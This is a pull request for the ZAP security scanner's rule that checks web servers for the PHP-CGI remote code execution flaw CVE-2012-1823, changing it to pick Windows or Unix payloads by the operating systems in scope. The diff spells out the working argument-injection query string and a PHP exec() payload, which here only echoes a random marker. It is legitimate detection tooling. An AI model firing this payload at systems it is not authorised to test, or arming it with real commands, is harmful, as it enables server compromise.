### PR TITLE
ascanrulesBeta: respect OS tech in PHP RCE scanner

### DIFF
--- a/src/org/zaproxy/zap/extension/ascanrulesBeta/RemoteCodeExecutionCVE20121823.java
+++ b/src/org/zaproxy/zap/extension/ascanrulesBeta/RemoteCodeExecutionCVE20121823.java
@@ -60,9 +60,8 @@ public class RemoteCodeExecutionCVE20121823 extends AbstractAppPlugin {
 	private static final String ATTACK_PARAM = "?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input";
 	private static final String PAYLOAD_BOILERPLATE = "<?php exec('<<<<COMMAND>>>>',$colm);echo join(\"\n\",$colm);die();?>";
 
-	private static final String[] PAYLOADS = {
-			PAYLOAD_BOILERPLATE.replace("<<<<COMMAND>>>>", "cmd.exe /C echo " + RANDOM_STRING),
-			PAYLOAD_BOILERPLATE.replace("<<<<COMMAND>>>>", "echo " + RANDOM_STRING) };
+	private static final String WIN_PAYLOAD = PAYLOAD_BOILERPLATE.replace("<<<<COMMAND>>>>", "cmd.exe /C echo " + RANDOM_STRING);
+	private static final String NIX_PAYLOAD = PAYLOAD_BOILERPLATE.replace("<<<<COMMAND>>>>", "echo " + RANDOM_STRING);
 
 	/**
 	 * returns the plugin id
@@ -136,55 +135,69 @@ public class RemoteCodeExecutionCVE20121823 extends AbstractAppPlugin {
 
 	@Override
 	public void scan() {
-		try {
-			URI originalURI = getBaseMsg().getRequestHeader().getURI();
-			//construct a new URL based on the original URL, but without any of the original parameters
-			URI attackURI = createAttackUri(originalURI, ATTACK_PARAM);
-			if (attackURI == null) {
+		URI originalURI = getBaseMsg().getRequestHeader().getURI();
+		//construct a new URL based on the original URL, but without any of the original parameters
+		URI attackURI = createAttackUri(originalURI, ATTACK_PARAM);
+		if (attackURI == null) {
+			return;
+		}
+
+		if (inScope(Tech.Windows)) {
+			if (scan(originalURI, attackURI, WIN_PAYLOAD)) {
 				return;
 			}
+		}
 
-			//tries payloads for Linux/Unix, and Windows until we find something that works
-			for ( String payload : PAYLOADS) {
-				//send it as a POST request, unauthorised, with the payload as the POST body.
-				HttpRequestHeader requestHeader = new HttpRequestHeader(HttpRequestHeader.POST, attackURI, HttpRequestHeader.HTTP11);
-				HttpMessage attackmsg = new HttpMessage(requestHeader);
-				attackmsg.setRequestBody(payload);
-				requestHeader.setContentLength(attackmsg.getRequestBody().length());
-				
-				sendAndReceive(attackmsg, false); //do not follow redirects
-				byte [] attackResponseBody = attackmsg.getResponseBody().getBytes();
-				String responseBody = new String(attackResponseBody);
-				
-				//if the command was not recognised (by the host OS), we get a response size of 0 on PHP, but not on Tomcat
-				//to be sure it's not a false positive, we look for a string to be echoed  
-				if (	attackmsg.getResponseHeader().getStatusCode() == HttpStatus.SC_OK 
-						&& attackResponseBody.length>= RANDOM_STRING.length()
-						&& responseBody.startsWith(RANDOM_STRING)						
-						) {
-					if ( log.isDebugEnabled() ) {
-						log.debug("Remote Code Execution alert for: "+ originalURI.getURI());
-					}
-						
-					//bingo.
-					bingo(	Alert.RISK_HIGH, 
-						Alert.CONFIDENCE_MEDIUM,
-						Constant.messages.getString("ascanbeta.remotecodeexecution.cve-2012-1823.name"),
-						Constant.messages.getString("ascanbeta.remotecodeexecution.cve-2012-1823.desc"), 
-						null, // originalMessage.getRequestHeader().getURI().getURI(),
-						null, // parameter being attacked: none.
-						payload,  // attack: none (it's not a parameter being attacked)
-						responseBody, //extrainfo
-						Constant.messages.getString("ascanbeta.remotecodeexecution.cve-2012-1823.soln"),
-						responseBody,		//evidence, highlighted in the message
-						attackmsg	//raise the alert on the attack message
-						);	
-					break;
+		if (isStop()) {
+			return;
+		}
+
+		if (inScope(Tech.Linux) || inScope(Tech.MacOS)) {
+			scan(originalURI, attackURI, NIX_PAYLOAD);
+		}
+	}
+	
+	private boolean scan(URI originalURI, URI attackURI, String payload) {
+		try {
+			//send it as a POST request, unauthorised, with the payload as the POST body.
+			HttpRequestHeader requestHeader = new HttpRequestHeader(HttpRequestHeader.POST, attackURI, HttpRequestHeader.HTTP11);
+			HttpMessage attackmsg = new HttpMessage(requestHeader);
+			attackmsg.setRequestBody(payload);
+			requestHeader.setContentLength(attackmsg.getRequestBody().length());
+			
+			sendAndReceive(attackmsg, false); //do not follow redirects
+			byte [] attackResponseBody = attackmsg.getResponseBody().getBytes();
+			String responseBody = new String(attackResponseBody);
+			
+			//if the command was not recognised (by the host OS), we get a response size of 0 on PHP, but not on Tomcat
+			//to be sure it's not a false positive, we look for a string to be echoed  
+			if (	attackmsg.getResponseHeader().getStatusCode() == HttpStatus.SC_OK 
+					&& attackResponseBody.length>= RANDOM_STRING.length()
+					&& responseBody.startsWith(RANDOM_STRING)						
+					) {
+				if ( log.isDebugEnabled() ) {
+					log.debug("Remote Code Execution alert for: "+ originalURI.getURI());
 				}
-			}			
+					
+				//bingo.
+				bingo(	Alert.RISK_HIGH, 
+					Alert.CONFIDENCE_MEDIUM,
+					Constant.messages.getString("ascanbeta.remotecodeexecution.cve-2012-1823.name"),
+					Constant.messages.getString("ascanbeta.remotecodeexecution.cve-2012-1823.desc"), 
+					null, // originalMessage.getRequestHeader().getURI().getURI(),
+					null, // parameter being attacked: none.
+					payload,  // attack: none (it's not a parameter being attacked)
+					responseBody, //extrainfo
+					Constant.messages.getString("ascanbeta.remotecodeexecution.cve-2012-1823.soln"),
+					responseBody,		//evidence, highlighted in the message
+					attackmsg	//raise the alert on the attack message
+					);	
+				return true;
+			}
 		} catch (Exception e) {
 			log.error("Error scanning a URL for Remote Code Execution via CVE-2012-1823: " + e.getMessage(), e);
 		}
+		return false;
 	}
 
 	private static URI createAttackUri(URI originalURI, String attackParam) {

--- a/src/org/zaproxy/zap/extension/ascanrulesBeta/ZapAddOn.xml
+++ b/src/org/zaproxy/zap/extension/ascanrulesBeta/ZapAddOn.xml
@@ -12,6 +12,7 @@
 	Do not attempt to parse empty cross domain policy files.<br>
 	Correct creation of attack URL in Source Code Disclosure - CVE-2012-1823.<br>
 	Correct creation of attack URL in Remote Code Execution - CVE-2012-1823.<br>
+	Respect OS techs included when scanning with Remote Code Execution - CVE-2012-1823.<br>
     ]]>
 	</changes>
 	<extensions>


### PR DESCRIPTION
Change scanner RemoteCodeExecutionCVE20121823 to respect the
technologies (OS) included in the scan, only try Windows attack if
Windows tech is included and Nix attack if Linux or MacOS tech are
included.
Update test and changes in ZapAddOn.xml file.